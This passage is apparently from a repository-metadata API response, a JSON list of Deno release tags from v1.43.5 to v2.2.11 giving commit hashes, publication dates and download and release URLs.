/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie